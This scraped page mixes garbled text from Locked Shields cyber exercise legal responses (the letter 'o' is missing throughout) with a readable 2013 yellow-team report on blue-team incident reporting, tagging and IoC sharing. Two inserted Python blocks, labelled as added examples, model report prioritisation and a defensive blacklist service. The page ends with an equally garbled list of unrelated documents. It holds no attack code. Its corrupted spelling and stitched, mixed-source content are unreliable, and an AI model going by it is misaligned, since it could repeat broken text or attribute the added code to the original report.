This measure culd bring us t legal prblems nt just within blea but als in the natins where the different scial media firms are lcated. Hacking int servers and altering data - n systems nt wned by the cnflict parties - wuld prbably be cnsidered as criminal act in all f thse natins. Other than the NYT Stry tld the wrld, BT10-Legal always stated clearly, that the main preventin frm prsecutin is the fact, that the supprt teams dn't hack ther systems. The UN-Mandate is n excuse fr criminal acts all arund the wrld. Other pssible measures There are tw measures that i wuld cnsider as lawful. We can try t use the scial media cmmunicatin f the attackers fr intelligence purpse. S we can prepare fr the attacks. But its likely, that they will be able t hide their cmmunicatins frm us - just because f the verwhelming mass f scial media messages. Secnd, we culd try t cntact thse scial media firms, that we think, the attackers will rely n. Mst f the scial media plattfrms frbid the use fr criminal purpse. S we culd warn them that there culd be a massive abuse f their platfrms fr the crdinatin f attacks n aid rgs. Perhaps the firms will try t help and filter thse messages r newsgrups n their wn. This wuld nly affect the attackers cmmunicatin and nt all f the users. Besides n hacking is needed, because the wner f the system himself is ding it. Best regards BT10-Legal 6. Inject 4, Day 2

114 16 f Inject Descriptin Legads, The press is ut f cntrl and reprting n us planning t g cyber ffensive. Where is this cming frm?? Find ut asap what the reference t cmmand and cntrl infrastructure means and what led the press t make such cnclusins, and send this infrmatin t me. Als, we will need t prvide a cunter-statement via the press t the general public t make sure this des nt result in chas. Please draft a reply addressing the false claims abut cyber ffense, and als tell them what the law really says, especially abut targeting civilians, and send it t me. Needless t say, we need t act fast! I will need the respnse frm yu by 11:15Z. MGen Alex Ander 6.2. Respnse frm Blue Team 5 Sir, We have n infrmatin where these infrmatin are cming frm and believe this culd be part f a prpaganda campaign rganized by BIT. We are nt deplying any means t start ffensive actins against BIT and cntinue acting in full accrdance with the?res and UN SC mandate. Belw is a draft press release. The Calitin strngly denies the infrmatin published by Lcked Shield News that it will target BIT cyber hacktivist thrugh lethal means. The Calitin has been taking defensive actins against cyber attachs launched by BIT and BIT sympathizers in full accrdance with the laws f armed cnflict. These actins are taken t ensure that the aid peratins can cntinue unimpended. It shuld be nted that under armed cnflict law, civilians cannt be targeted. Hwever, civilians participating t hstilies lse this immunity and can be targeted as lng as they participate t hstilities. This culd allw the use f cyber and kynetic means. It is hwever the Calitin plicy t use the least amunt f frce necessary t stp these attacks. The Calitin expects that we can cntinue acting thrugh cyber means nly and are cperating with law enfrcement agency in Blea t arrest the persns taking part in these attacks. The Calitin is perating under a clear mandate frm the UN Security Cuncil t assist the civilian ppulatin f Blea. 
This mandate has nt changed. The NATO mandate is als limited t defensive actins nly. 4. In terms f the persnal data, we have infrmed the Blean data prtectin authrity f the leak. We have started investigating the extent f the release f data and carried ut an assessment f the risks caused by the breach. Mrever, we have infrmed the persns cncerned and taken them t safety t ensure that they are nt targeted by BIT sympatizers. BT5 LEGAD

Contents
1. Executive Summary
2. About the Technology
3. Reporting Volume and Types
4. Reporting Quality
5. Recommendations
6. Feedback to the Blue Teams

1. Executive Summary

The Yellow team's focus was to provide situation awareness over the game events. The team facilitated in-game and out-of-game data collection, processing and visualization. In-game data collection consisted of facilitating expert information sharing between the blue teams and the yellow/white team. Out-of-game collection focused on facilitating the various scoring requirements, from automatic scoring to manual scoring.

This year, we received 1242 incident reports, which is a significant increase compared to the year 2012. In 2012 we received 376 reports (an average of 42 per team). The increase in volume introduced a slight decrease in the average value of each report. However, as a whole we had better insight into the game events, as well as into the maturity of different teams. Furthermore, having real data is an excellent starting point for improving the collaboration between blue teams (critical infrastructure defenders) and the yellow team (headquarters).

This report focuses on observations that can be used next year to enhance the quality of reports, as well as on assigning priorities to new capabilities which have been planned for the future, namely:

- IoC sharing service - Blue teams voluntarily shared and used intelligence about malicious identities in their incident reports. Identities were mostly IP addresses. This kind of sharing is fairly easy to streamline. Also, headquarters can automatically provide further intelligence about the identities, which in turn provides an in-game incentive for blue team sharing.
- Action journal - while proactive actions are valuable information that could be shared, they should be treated as a separate workflow from incident reporting. If blue teams like to report proactive actions anyway, a simpler process could be introduced to increase the overall throughput of information sharing.

2. About the Technology

The exercise used the AbuseSA product with the CDX extension to facilitate collaboration, information sharing and situation awareness. It combines different tools and workflows seamlessly and adapts to changing requirements in order to improve the process iteratively as new knowledge and goals require. The AbuseSA base product is designed for collecting, aggregating, normalizing and visualizing information from various sources, to provide actionable reports and situation awareness visualizations. The CDX extension is a module that enables domain experts to contribute insight into the situation awareness.

Picture: The CDX extension implements a light-weight human reporting workflow, designed to serve users ranging from local experts to decision makers (pictures from another exercise).
Picture: In 2012 the CDX extension implemented light-weight reporting. In 2013 it brought in workflows to provide feedback to the blue teams, as well as to the decision makers.
Picture: All teams provide a wide range of different types of reports.

3. Reporting Volume and Types

The reporting volume tripled this year. There are probably two reasons for the increase: 1) we had stripped formality from the reports, so reporting required less cognitive overhead, and 2) several of the teams, perhaps as a result of low-overhead reporting, treated every observation as an incident. For example, one IDS event would constitute an incident. A similar thing was observed in reports of proactive actions. Some teams reported every fix as a separate incident, even though similar actions were performed on different machines.

However, the fact that teams are reporting, even at too detailed a level, is a much better situation compared to previous years, where any insight was hard to get. Even data which could be considered useless at first glance tells a story on a deeper look. For example, if a team mostly reports IDS observations, it provides a hypothesis: is this team operating mostly on a reactive level? Also, the fact that a lot of proactive measures were reported could tell us that the next exercise could focus on more advanced topics, while basic due diligence actions, such as patching and vulnerability scanning, could be considered business-as-usual.

About the Tagging

By combining the benefits which come from focusing on situation awareness (instead of long-term historical trends) and centralized tagging, we enjoy the following benefits:

- Spending time to create a bullet-proof hierarchical taxonomy to cover the types of observations is not necessary. Training reporters in this taxonomy is not necessary either. Hierarchical taxonomies suffer from the following issues:
  - Creating a working hierarchical taxonomy is close to impossible. Even more so in the cyber world, where there is no long history of classifying different events.
  - It is hard for humans to pick one category, if only one is allowed. For example, if the taxonomy consisted of exploit and defacement, what should the reporter use in the case where the defacement was done by exploiting a web or database server?
  - After the taxonomy is implemented, it is hard to modify, as the previously collected data will need revisiting.
- We can adjust our plans during the game. For example, if we want to start observing whether the teams understand that DoS attacks were conducted through BGP poisoning instead of flooding traffic, we can start tagging BGP observations accordingly. Overall, we can adjust the level of detail of situation awareness by utilizing more high-level tags or more detailed tags. Especially when the ontology is controlled by the person responsible for analyzing and reporting the observations, this freedom provides a powerful tool to the analyst.
- We can use several tags if we want to highlight several aspects of one report.

Below, we explain the tags used in the exercise.

- Proactive - any kind of proactive measure to prevent future compromises. Patching, fixing of web application vulnerabilities, code review etc.
- Attempt - a failed attempt at malicious activity. Failed SQL injection, failed exploit, blocked attack etc.
- Suspicious - a suspicion of malicious activity. Typically IDS alerts.
- Compromise - a successful compromise of the system. Planted malware, planted user accounts, backdoors etc.
- Insufficient Information - the analyst could not deduce which tags he or she should use.
- Recon - reconnaissance activity from the perpetrator. Mostly port or vulnerability scanning.
- DoS - denial of service. DDoS flooding, rendering a service useless by configuration change, crashing a service with malicious requests or responses.
- BGP-Poisoning - a special case of DoS the yellow team started monitoring for after the red team started to conduct BGP poisoning attacks.
- False - confirmed false alarms.
- Policy Violation - incidents that are not necessarily a result of malicious activity, but probably reported because they contradict the policies of any given organization. P2P traffic, undocumented hosts in the network etc.
- Duplicate - reports that were accidentally duplicated by the blue teams. For example, if a new ticket was accidentally created when providing additional information.
- Irrelevant - reports that are fully irrelevant in the context of incident reporting. Greetings, giving feedback on the reporting system etc. The Irrelevant tag does not mean that there is no value at all in these kinds of reports. For example, boosting morale or using a convenient channel for giving feedback is still useful in contexts other than incident reporting.
- Legal - teams considering legal implications or asking for legal advice.
- Phishing - phishing reports. For example, a user has received an email requesting usernames and passwords.
- Physical - in-game physical event, such as an explosion in the server room.

The reader should consider their own tagging based on the lessons learned in this document when creating their own tagging ontology.

Distribution

When blue teams shared their observations, the yellow team assigned tags to the events. Yellow team tagging took seconds per report, depending on the quality of the report. In most cases, 30 seconds was enough. During the first day, attempting to handle all the reports generated some backlog for the YT analyst, who also conducted other tasks, such as giving situation briefings, searching for information for the White and Red teams etc., as well as introducing the system to VIP visitors. On the second day, we changed approach. We only handled reports whose state was open at any given moment. We assumed that if a case is closed (quickly), the expected value of the report drops, while open cases deserve more attention. After the exercise, we tagged all the remaining (closed) reports.

Picture: On the second day we introduced a workflow where we had a task list consisting of untagged open reports.
Picture: Distribution of report tags assigned by the yellow team. In future exercises, we expect to see a drop in the number of types presented in different shades of gray.

Priorities

Now that we have plenty of reports at our disposal, we had a look at how a clearer focus would affect the reporting volumes. We assigned priorities to different types of reports, as follows:

- First priority: an incident has happened, or there is good confidence that a break-in was attempted.
- Second priority: observations of reconnaissance activity, or reports that do not contain enough information to deduce whether an incident has happened.
- Third priority: information that was provided outside the scope of the original intent.

Table: Priorities were assigned as shown.

tag                       # of reports   priority
proactive                 350            third
attempt                   258            first
compromise                151            first
suspicious                178            second
insufficient information   99            second
recon                      69            second
technical issue            47            third
defacement                 32            first
dos                        20            first
bgp-poisoning              17            first
false                      13            third
policy violation            6            first
duplicate                   5            first
irrelevant                  5            third
unclassified                5            first
legal                       3            first
physical                    1            first
phishing                    1            first

Picture: With tighter focus, the number of incident reports could be cut down to below half.

4. Reporting Quality

In this section we exemplify what can be deduced from the reports. The best takeaway from this section is to understand what would be possible if reporting were implemented in a more controlled environment, such as in an organization or inside a nation, where critical actors would undergo half-day training on reporting. The current data set is based on reports provided by individuals with little or no training, so we expect a certain amount of bias in the reports.
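The tag-to-priority mapping from the table and the "several tags per report" rule can be run as a small script. The following Python is an added example, not code from the report or from AbuseSA; the tag counts are the table's own, the handful of reports it classifies are constructed, and the function names are this example's, not the yellow team's:

```python
"""Added example, not code from the Locked Shields 2013 report or from AbuseSA:
the multi-tag classification and three-level prioritisation described above,
applied to the yellow team's tag counts from the table and to a few
constructed reports."""
from collections import Counter

# Tag -> priority level (1 = first), exactly as in the table above.
TAG_PRIORITY = {
    "proactive": 3, "attempt": 1, "compromise": 1, "suspicious": 2,
    "insufficient information": 2, "recon": 2, "technical issue": 3,
    "defacement": 1, "dos": 1, "bgp-poisoning": 1, "false": 3,
    "policy violation": 1, "duplicate": 1, "irrelevant": 3,
    "unclassified": 1, "legal": 1, "physical": 1, "phishing": 1,
}

# Reports carrying each tag, from the table above.
TAG_COUNTS = {
    "proactive": 350, "attempt": 258, "compromise": 151, "suspicious": 178,
    "insufficient information": 99, "recon": 69, "technical issue": 47,
    "defacement": 32, "dos": 20, "bgp-poisoning": 17, "false": 13,
    "policy violation": 6, "duplicate": 5, "irrelevant": 5,
    "unclassified": 5, "legal": 3, "physical": 1, "phishing": 1,
}


def report_priority(tags):
    """Several tags may sit on one report; the most urgent one decides.
    No tags at all is the 'insufficient information' case; a tag the
    ontology does not know yet is 'unclassified'."""
    if not tags:
        return TAG_PRIORITY["insufficient information"]
    return min(TAG_PRIORITY.get(t, TAG_PRIORITY["unclassified"]) for t in tags)


def priority_volume(tag_counts):
    """Report volume per priority level when every tag is assigned its level."""
    per_level = Counter()
    for tag, n in tag_counts.items():
        per_level[TAG_PRIORITY[tag]] += n
    return dict(sorted(per_level.items()))


def first_priority_share(tag_counts):
    """Fraction of the volume an analyst would face with first-priority focus."""
    vol = priority_volume(tag_counts)
    return vol[1] / sum(vol.values())


def retag(reports, predicate, new_tag, priority):
    """Mid-game ontology change: introduce (or re-prioritise) a tag and apply
    it to every existing report the predicate selects. Returns the hit count."""
    TAG_PRIORITY[new_tag] = priority
    hits = [r for r in reports if predicate(r)]
    for r in hits:
        r["tags"].add(new_tag)
    return len(hits)


def triage(reports):
    """Work order for the analyst: first priority first, then by report id."""
    return sorted(reports, key=lambda r: (report_priority(r["tags"]), r["id"]))


def demo_reports():
    """Constructed reports; the text is the kind of thing a blue team wrote."""
    return [
        {"id": 1, "tags": {"suspicious"}, "text": "IDS alert, single host"},
        {"id": 2, "tags": {"compromise", "defacement"}, "text": "index page replaced, webshell found"},
        {"id": 3, "tags": {"proactive"}, "text": "patched CMS on all web hosts"},
        {"id": 4, "tags": {"dos"}, "text": "site unreachable, our prefix announced from a foreign AS"},
        {"id": 5, "tags": set(), "text": "blacklisted an address"},
    ]


if __name__ == "__main__":
    print(priority_volume(TAG_COUNTS), round(first_priority_share(TAG_COUNTS), 2))
    reports = demo_reports()
    # The yellow team's own mid-game move: start tagging BGP observations.
    retag(reports, lambda r: "dos" in r["tags"] and "prefix" in r["text"], "bgp-poisoning", 1)
    print([r["id"] for r in triage(reports)])
```

With the table's counts the first-priority share comes out at 499 of 1260 tag assignments, which is the "below half" the picture caption refers to; the retag call shows how an existing DoS report picks up the BGP-poisoning tag without touching the rest of the ontology.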

Proactive Actions (A)

A number of teams reported a large number of proactive actions. Especially blue2, blue3, blue5 and blue6 were reporting masses of proactive actions. While proactive actions do not belong to the domain of incident reporting, the channel was used for them, probably due to convenience. The White team asked blue teams to report proactive actions as well, and low-overhead reporting provided an easy way of doing that. Quite often, teams did not aggregate the actions, e.g. the same action on several different machines was reported as separate actions. We can deduce two things from our observations:

- Given that the teams went to the trouble of providing information even for single actions, the reporting was sufficiently easy. There is room for introducing a bit more granularity to the reporting.
- Given the lack of aggregation, a number of teams seem to think mostly on the operational level. Tactics and strategies might be overlooked. Some uncertainty can be assigned to this conclusion, as some of the teams might have thought that a higher number of reports correlates with a better score.

Suspicious (B)

Reports tagged with suspicious consisted mostly of reports that we know or suspect to be the result of an IDS alert. IDS alerts historically have a lot of false positives, so we didn't go further in our speculation. Also in these reports, the lack of aggregation was visible. The high number of blue1 reports with the suspicious tag implies that blue1 reported each IDS alert as a separate report. Their solution from the national defense perspective was suboptimal, as expert information sharing was designed to avoid exactly the problem of analysts having a number of machine reports at hand, lacking all the insight that local experts could provide. Furthermore, this kind of activity belongs to automation. There would have been a module to collect Snort alerts automatically, should we have chosen to utilize it.

Attempt (C)

Attempts were reported by several teams and sometimes in volumes. Especially Blue3, Blue4 and Blue5 provided a lot of data on attempted attacks. Some correlation between proactive measures and attempts (unsuccessful attacks) is visible, for example in the blue3 and blue5 reports. However, contradicting material is also visible, for example in the blue6 reports (74 proactive measures vs 5 attempts and 11 compromises).

Insufficient Information (D)

Quite often, reports were tagged with "insufficient information" because the team did not state explicitly or implicitly the impact of the attack. For example, they reported IDS observations and actions (such as blacklisting), but gave no insight into whether the attack was successful or not. The analysts were quite often able to deduce the impact from weak signals, such as the team stating that "malware was removed". In these cases we tagged the report appropriately (compromise), while another approach would have been to teach the team to provide more detail. Providing seemingly trivial details would be beneficial, since it takes a few seconds for the team to mention the impact, while it could take several minutes for the analysts to make the decision based on anecdotal information.

Defacements (E)

It was delightful to see that the ratio between compromise reports and defacement reports had turned more heavily towards discovering compromises. Defenders see defacements more easily, so we expect a bias towards defacement reports. Defacements can be a form of diversion from the Red Team's side. In the 2012 exercise we for example saw that when the red team was conducting two attacks at the same time, namely defacements and stealing of SCADA passwords, only the defacements got reported. The lack of defacement reports can also be explained by the fact that the Red Team de-emphasized defacement attacks this year.

5. Recommendations

Based on our observations, we list below recommendations that would take information sharing and situation awareness to the next level in future exercises.

IoC Sharing Service

IoC refers to Indicators of Compromise. Traditionally, these have been used to share indicators such as malicious IP addresses, C&C domain names, hashes of malware etc. Introducing the IoC concept to the game would direct the players to think about what kind of information is useful to share. It would bring focus to the reports. We don't propose implementing the OpenIOC XML format in the game due to the added complexity. However, we propose that we take the idea and provide a simple way to share indicators of compromise. This information can be utilized in many ways:

- The YT/White team can automatically provide intelligence based on the IoCs shared by the blue teams. This will create an in-game incentive for the reporters, as well as better simulate the real-world scenario, where it is close to impossible to find the perpetrator without international collaboration, which is quite often based on sharing this kind of information.
- Malicious identities can be monitored automatically, if deemed necessary.
- Some teams, if they deem it necessary, can tap into the IoC sharing service and either automate or semi-automate the blacklisting of selected identities (confirmed C&C servers and so forth). Of course, teams should be free to fully automate blacklisting of all identities, and suffer the consequences through a dropped service level (learn by doing).

More Focus on the Context of Reporting when Introducing Reporting Instructions

When different game aspects are introduced in live meetings before and during the game, the context of reporting should be explained to the blue teams. For example:

- The context is to share information that a national actor can share with other defenders, in order to strengthen the defense.
- IoCs are valuable as their utilization can be automated and defenses get closer to real time.
- Single actions are not interesting in the context of collaborative defense, as this high-volume detailed information is harder to share and put into use in other teams. However, clever tips and tricks should be shared, with a workflow which contains fewer steps. There could be a simple portal for sharing tips and tricks, which would be accessible to all blue teams.
- The goal is to build insight. So it would be better to aggregate observations into fewer separate incidents, in order to build up an incident history.

Critical Infra Protection Sensor Service

Several countries are already running a national critical infrastructure monitoring service. A similar service could be introduced to the game, as a complementary service, in a fairly automated manner. For example, sensors could observe malicious identities shared by blue teams, and create alerts based on sensors run for each blue team (critical infrastructure provider). The Yellow team would have overall situation awareness of what kind of actionable alerts are seen in different teams. Blue teams could benefit from a centralized service provided by a small team of security professionals. This would not remove the need for teams to run their own detection capabilities, as the sensor network would focus on threats against the whole critical infrastructure, as opposed to trying to catch each and every incident that could happen inside a blue team.

6. Feedback to the Blue Teams

Initially, we considered giving individual feedback. However, as the feedback was mostly the same for everyone, we give feedback for all below. Furthermore, we have considered how to enhance the reporting so that this kind of feedback would not be necessary in the following years.

Successful Collaboration

All the teams reported their actions and observations diligently. Based on the results of LS13, we can safely say that information sharing is at least technically possible, and people are willing to share, given that they do not need to consider the potential negative aspects of sharing, such as legal and political implications. We hope that the exercise has demonstrated through practice that there is a lot of information that can be shared without legal issues. We also observed collaborative initiatives that occurred even without a specific incentive in the exercise. We saw blacklisting services, malware analysis and sharing of tips and tricks to protect others. We would like to thank the teams who showed practical examples of how teams can collaborate just because it is the right thing to do.

Incident History

A lot of the teams treated the reporting as a single-shot channel to report actions, whereas the headquarters expected incidents where the knowledge would build up over time by itself (e.g. the yellow team does not have to aggregate the different reports itself to gain overall understanding). In practice, building understanding would happen by using selected hashtags for certain phenomena, and reusing those hashtags when additional information occurs. Getting the bird's-eye view right from the start is not simple, so we understand that splits and merges of incidents cannot be totally avoided. However, we would have expected some increase in reports where different observations accumulate into single reports.

Human Insight vs Alerts from Automation

This is related to the remarks made in the section Incident History. The reason expert information sharing was implemented was to avoid the pitfalls of a non-local expert analyzing technical information without access to the data that the local experts have (network captures, logs etc.). Thus providing incident reports, for example from each IDS alert, was a bit counterproductive. This kind of report increases the workload of YT/Headquarters, and that is time away from analyzing the confirmed incidents.
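The IoC sharing service recommended in section 5 and the hashtag-driven incident history asked for in section 6 fit together in one small model: reports that reuse a hashtag accumulate into one incident, indicators are pulled out of the report text, headquarters hands back what it knows about each indicator, and only corroborated or HQ-confirmed network identities go into a shared blacklist. The Python below is an added example, not the yellow team's code and not part of AbuseSA; every team name, report text, indicator and HQ intelligence entry in it is constructed, and all class and function names are this example's own:

```python
"""Added example, not code from the Locked Shields 2013 report or from AbuseSA:
an in-memory model of the IoC sharing service and the hashtag-based incident
history recommended above. Team names, report texts, indicators and the HQ
intelligence table are constructed sample data."""
import ipaddress
import re
from collections import defaultdict
from dataclasses import dataclass, field

HASHTAG_RE = re.compile(r"#([A-Za-z0-9_-]+)")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b")
SHA256_RE = re.compile(r"\b[0-9a-f]{64}\b")

# Constructed: what headquarters already knows about some identities.
HQ_INTEL = {"198.51.100.23": "confirmed C&C server",
            "update-cdn.example": "hosts second-stage downloader"}


def extract_iocs(text):
    """Pull (kind, value) indicators out of a free-text report body."""
    low = text.lower()
    iocs = set()
    for ip in IPV4_RE.findall(low):
        try:
            ipaddress.ip_address(ip)  # drops 999.1.1.1-style noise
        except ValueError:
            continue
        iocs.add(("ip", ip))
    iocs.update(("domain", d) for d in DOMAIN_RE.findall(low))
    iocs.update(("sha256", h) for h in SHA256_RE.findall(low))
    return iocs


@dataclass
class Incident:
    """Knowledge that accumulates under one hashtag over time."""
    hashtag: str
    reports: list = field(default_factory=list)   # (team, text) pairs
    teams: set = field(default_factory=set)
    iocs: set = field(default_factory=set)


class SharingService:
    def __init__(self):
        self.incidents = {}
        self.ioc_reporters = defaultdict(set)  # indicator -> teams that saw it

    def submit(self, team, text):
        """File a report under each hashtag it carries (or 'untagged'), so a
        later report with the same tag extends the incident instead of
        opening a new one that HQ would have to merge by hand."""
        tags = [t.lower() for t in HASHTAG_RE.findall(text)] or ["untagged"]
        iocs = extract_iocs(text)
        for ioc in iocs:
            self.ioc_reporters[ioc].add(team)
        for tag in tags:
            inc = self.incidents.setdefault(tag, Incident(tag))
            inc.reports.append((team, text))
            inc.teams.add(team)
            inc.iocs |= iocs
        return tags

    def enrich(self, ioc):
        """HQ feedback on one indicator: who else saw it and what HQ knows."""
        return {"kind": ioc[0], "value": ioc[1],
                "reported_by": sorted(self.ioc_reporters.get(ioc, ())),
                "hq_note": HQ_INTEL.get(ioc[1])}

    def shared_blacklist(self, min_teams=2):
        """Selective feed: network identities corroborated by several teams or
        by HQ. A single unconfirmed sighting is not pushed to everyone."""
        return {value for (kind, value), teams in self.ioc_reporters.items()
                if kind in ("ip", "domain")
                and (len(teams) >= min_teams or value in HQ_INTEL)}


SAMPLE_REPORTS = [  # constructed
    ("blue3", "Webmail host beacons to 198.51.100.23:443 every 60s, dropper "
              "sha256 " + "deadbeef" * 8 + " #webmail-backdoor"),
    ("blue5", "Same C&C 198.51.100.23 in proxy logs, stage two pulled from "
              "update-cdn.example #webmail-backdoor"),
    ("blue5", "CMS patched on all public web hosts #proactive"),
    ("blue1", "IDS alert: port scan from 203.0.113.9 against DMZ"),
]


def build_demo():
    svc = SharingService()
    for team, text in SAMPLE_REPORTS:
        svc.submit(team, text)
    return svc


if __name__ == "__main__":
    svc = build_demo()
    for name, inc in svc.incidents.items():
        print(f"{name}: {len(inc.reports)} reports from {sorted(inc.teams)}, {len(inc.iocs)} IoCs")
    print("shared blacklist:", sorted(svc.shared_blacklist()))
    print(svc.enrich(("ip", "198.51.100.23")))
```

The blacklist rule is the "selected identities" option from section 5: blue1's lone scanner address stays out of the shared feed, while the C&C address seen by two teams and the domain HQ already knows about go in. A team that wants to "fully automate blacklisting of all identities" would simply call shared_blacklist(min_teams=1), and would take on the service-level risk the report describes.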


More information

How to put together a Workforce Development Fund (WDF) claim 2015/16

How to put together a Workforce Development Fund (WDF) claim 2015/16 Index Page 2 Hw t put tgether a Wrkfrce Develpment Fund (WDF) claim 2015/16 Intrductin What eligibility criteria d my establishment/s need t meet? Natinal Minimum Data Set fr Scial Care (NMDS-SC) and WDF

More information

Licensing Windows Server 2012 for use with virtualization technologies

Licensing Windows Server 2012 for use with virtualization technologies Vlume Licensing brief Licensing Windws Server 2012 fr use with virtualizatin technlgies (VMware ESX/ESXi, Micrsft System Center 2012 Virtual Machine Manager, and Parallels Virtuzz) Table f Cntents This

More information

TaskCentre v4.5 Send Message (SMTP) Tool White Paper

TaskCentre v4.5 Send Message (SMTP) Tool White Paper TaskCentre v4.5 Send Message (SMTP) Tl White Paper Dcument Number: PD500-03-17-1_0-WP Orbis Sftware Limited 2010 Table f Cntents COPYRIGHT 1 TRADEMARKS 1 INTRODUCTION 2 Overview 2 FEATURES 2 GLOBAL CONFIGURATION

More information

HOWTO: How to configure SSL VPN tunnel gateway (office) to gateway

HOWTO: How to configure SSL VPN tunnel gateway (office) to gateway HOWTO: Hw t cnfigure SSL VPN tunnel gateway (ffice) t gateway Hw-t guides fr cnfiguring VPNs with GateDefender Integra Panda Security wants t ensure yu get the mst ut f GateDefender Integra. Fr this reasn,

More information

GETTING STARTED With the Control Panel Table of Contents

GETTING STARTED With the Control Panel Table of Contents With the Cntrl Panel Table f Cntents Cntrl Panel Desktp... 2 Left Menu... 3 Infrmatin... 3 Plan Change... 3 Dmains... 3 Statistics... 4 Ttal Traffic... 4 Disk Quta... 4 Quick Access Desktp... 4 MAIN...

More information

PENETRATION TEST OF THE INDIAN HEALTH SERVICE S COMPUTER NETWORK

PENETRATION TEST OF THE INDIAN HEALTH SERVICE S COMPUTER NETWORK Department f Health and Human Services OFFICE OF INSPECTOR GENERAL PENETRATION TEST OF THE INDIAN HEALTH SERVICE S COMPUTER NETWORK Inquiries abut this reprt may be addressed t the Office f Public Affairs

More information

Change Management Process

Change Management Process Change Management Prcess B1.10 Change Management Prcess 1. Intrductin This plicy utlines [Yur Cmpany] s apprach t managing change within the rganisatin. All changes in strategy, activities and prcesses

More information

Firewall/Proxy Server Settings to Access Hosted Environment. For Access Control Method (also known as access lists and usually used on routers)

Firewall/Proxy Server Settings to Access Hosted Environment. For Access Control Method (also known as access lists and usually used on routers) Firewall/Prxy Server Settings t Access Hsted Envirnment Client firewall settings in mst cases depend n whether the firewall slutin uses a Stateful Inspectin prcess r ne that is cmmnly referred t as an

More information

Archiving IVTVision Video (Linux)

Archiving IVTVision Video (Linux) Archiving IVTVisin Vide (Linux) 1 Intrductin Because IVTVisin Server recrds vide using a straightfrward perating system file structure, archiving vide shuld be simple fr any IT prfessinal. This dcument

More information

How To Install An Orin Failver Engine On A Network With A Network Card (Orin) On A 2Gigbook (Orion) On An Ipad (Orina) Orin (Ornet) Ornet (Orn

How To Install An Orin Failver Engine On A Network With A Network Card (Orin) On A 2Gigbook (Orion) On An Ipad (Orina) Orin (Ornet) Ornet (Orn SlarWinds Technical Reference Preparing an Orin Failver Engine Installatin Intrductin t the Orin Failver Engine... 1 General... 1 Netwrk Architecture Optins and... 3 Server Architecture Optins and... 4

More information

Systems Support - Extended

Systems Support - Extended 1 General Overview This is a Service Level Agreement ( SLA ) between and the Enterprise Windws Services t dcument: The technlgy services the Enterprise Windws Services prvides t the custmer. The targets

More information

Welcome to Remote Access Services (RAS)

Welcome to Remote Access Services (RAS) Welcme t Remte Access Services (RAS) Our gal is t prvide yu with seamless access t the TD netwrk, including the TD intranet site, yur applicatins and files, and ther imprtant wrk resurces -- whether yu

More information

Readme File. Purpose. Introduction to Data Integration Management. Oracle s Hyperion Data Integration Management Release 9.2.

Readme File. Purpose. Introduction to Data Integration Management. Oracle s Hyperion Data Integration Management Release 9.2. Oracle s Hyperin Data Integratin Management Release 9.2.1 Readme Readme File This file cntains the fllwing sectins: Purpse... 1 Intrductin t Data Integratin Management... 1 Data Integratin Management Adapters...

More information

Installation Guide Marshal Reporting Console

Installation Guide Marshal Reporting Console Installatin Guide Installatin Guide Marshal Reprting Cnsle Cntents Intrductin 2 Supprted Installatin Types 2 Hardware Prerequisites 2 Sftware Prerequisites 3 Installatin Prcedures 3 Appendix: Enabling

More information

AVG AntiVirus Business Edition

AVG AntiVirus Business Edition AVG AntiVirus Business Editin User Manual Dcument revisin AVG.02 (30.9.2015) C pyright AVG Technlgies C Z, s.r.. All rights reserved. All ther trademarks are the prperty f their respective wners. Cntents

More information

HIPAA HITECH ACT Compliance, Review and Training Services

HIPAA HITECH ACT Compliance, Review and Training Services Cmpliance, Review and Training Services Risk Assessment and Risk Mitigatin: The first and mst imprtant step is t undertake a hlistic risk assessment that examines the risks and cntrls related t fur critical

More information

MANAGED VULNERABILITY SCANNING

MANAGED VULNERABILITY SCANNING Abut SensePst SensePst is an independent and bjective rganisatin specialising in infrmatin security cnsulting, training, security assessment services and IT Vulnerability Management. SensePst is abut security.

More information

Aladdin HASP SRM Key Problem Resolution

Aladdin HASP SRM Key Problem Resolution Aladdin HASP SRM Key Prblem Reslutin Installatin flwchart fr EmbrideryStudi and DecStudi e1.5 Discnnect frm the Internet and disable all anti-virus and firewall applicatins. Unplug all dngles. Insert nly

More information

WEB APPLICATION SECURITY TESTING

WEB APPLICATION SECURITY TESTING WEB APPLICATION SECURITY TESTING Cpyright 2012 ps_testware 1/7 Intrductin Nwadays every rganizatin faces the threat f attacks n web applicatins. Research shws that mre than half f all data breaches are

More information

Often people have questions about new or enhanced services. This is a list of commonly asked questions and answers regarding our new WebMail format.

Often people have questions about new or enhanced services. This is a list of commonly asked questions and answers regarding our new WebMail format. Municipal Service Cmmissin Gerald P. Cle Frederick C. DeLisle Thmas M. Kaul Gregry L. Riggle Stanley A. Rutkwski Electric, Steam, Water Cable Televisin and High Speed Internet Service since 1889 Melanie

More information

Installation Guide Marshal Reporting Console

Installation Guide Marshal Reporting Console INSTALLATION GUIDE Marshal Reprting Cnsle Installatin Guide Marshal Reprting Cnsle March, 2009 Cntents Intrductin 2 Supprted Installatin Types 2 Hardware Prerequisites 3 Sftware Prerequisites 3 Installatin

More information

Service Desk Self Service Overview

Service Desk Self Service Overview Tday s Date: 08/28/2008 Effective Date: 09/01/2008 Systems Invlved: Audience: Tpics in this Jb Aid: Backgrund: Service Desk Service Desk Self Service Overview All Service Desk Self Service Overview Service

More information

Improved Data Center Power Consumption and Streamlining Management in Windows Server 2008 R2 with SP1

Improved Data Center Power Consumption and Streamlining Management in Windows Server 2008 R2 with SP1 Imprved Data Center Pwer Cnsumptin and Streamlining Management in Windws Server 2008 R2 with SP1 Disclaimer The infrmatin cntained in this dcument represents the current view f Micrsft Crpratin n the issues

More information

ATL: Atlas Transformation Language. ATL Installation Guide

ATL: Atlas Transformation Language. ATL Installation Guide ATL: Atlas Transfrmatin Language ATL Installatin Guide - versin 0.1 - Nvember 2005 by ATLAS grup LINA & INRIA Nantes Cntent 1 Intrductin... 3 2 Installing ADT frm binaries... 3 2.1 Installing Eclipse and

More information

The Ohio Board of Regents Credit When It s Due process identifies students who

The Ohio Board of Regents Credit When It s Due process identifies students who Credit When It s Due/ Reverse Transfer FAQ fr students Ohi is participating in a natinal grant initiative, Credit When It s Due, designed t implement reverse-transfer, which is a prcess t award assciate

More information

Networking Best Practices

Networking Best Practices Netwrking Best Practices Use f a Lad Balancer With Hitachi Cntent Platfrm and Hitachi Cntent Platfrm Anywhere By Hitachi Data Systems August 2015 Cntents Executive Summary... 3 Intrductin... 4 Lad Balancer

More information

NASDAQ BookViewer 2.0 User Guide

